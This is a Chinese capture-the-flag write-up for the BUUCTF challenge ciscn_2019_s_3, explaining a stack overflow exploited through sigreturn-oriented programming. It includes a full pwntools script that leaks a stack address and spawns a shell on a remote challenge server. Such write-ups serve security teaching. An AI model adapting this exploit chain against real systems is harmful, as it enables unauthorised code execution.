64位，開啟了NX保護

main函數調用了vuln


?在程序之中的gadgets存在著兩個為rax賦值的gadget

execve的系統調用可以參照vuln中的調用找gadget實現，這里采用SROP方式，利用15號系統調用rt_sigreturn

因為在IDA并沒用發現可以利用的/bin/sh等，而且有read,write函數中的棧溢出可以利用，故考慮構造/bin/sh，同時泄露/bin/sh的地址

我們需要確定棧的位置和棧的偏移

棧的位置我們可以通過main函數的參數argv[0]得到，就是程序一開始時候的rsi，偏移

.只要我們輸入數據之后（aaaa），find aaaa找到他的地址，然后相減就可以了.

下面是計算調試過程:

from pwn import * p=process('./ciscn_s_3') #p=remote('node3.buuoj.cn',26145) context.log_level = 'debug' gdb.attach(p) p.interactive()

按r使程序運行輸入 aaaa

0x7fffffffdea0與rsi相同

因為write只能打印0x30大小的字符, 前面的0x20大小是用不到的

計算偏移 dfb8 - dea0 = 0x118（280）

解題思路

pwntools中有一個函數SigreturnFrame()可以便捷構造frame框架，再泄露出棧的地址，傳入字符串，拿到shell。
?棧的地址可以通過main函數的參數argv[0]就是程序一開始時候的rsi得到，棧的地址拿到后，還需要知道棧的偏移量，棧的偏移量可以通過gdb調試得到。

#!/usr/bin/python2

-- coding:utf-8 --

from pwn import * context.arch = 'amd64' context.log_level = 'debug'#p = process('./ciscn_s_3') p = remote('node3.buuoj.cn',29246) sigreturn = 0x4004DA read_write = 0x4004F1 system_call = 0x400517payload = '/bin/sh\x00' + 'a'*0x8 + p64(read_write) p.send(payload) p.recv(32) sh_addr = u64(p.recv(8)) - 0x118p.recv(8)frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = sh_addr frame.rsi = 0 frame.rdx = 0 #frame.rsp = sh_addr-0x118 frame.rip = system_callpayload = 'a'*0x10+p64(sigreturn)+p64(system_call)+str(frame) p.send(payload) log.success('stack_addr: ' + hex(sh_addr+0x118)) p.interactive()

‘/bin/sh\x00’ 因為 /bin/sh 有7個字節 需要補充 \x00 來構成8個字節

總結

以上是生活随笔為你收集整理的BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。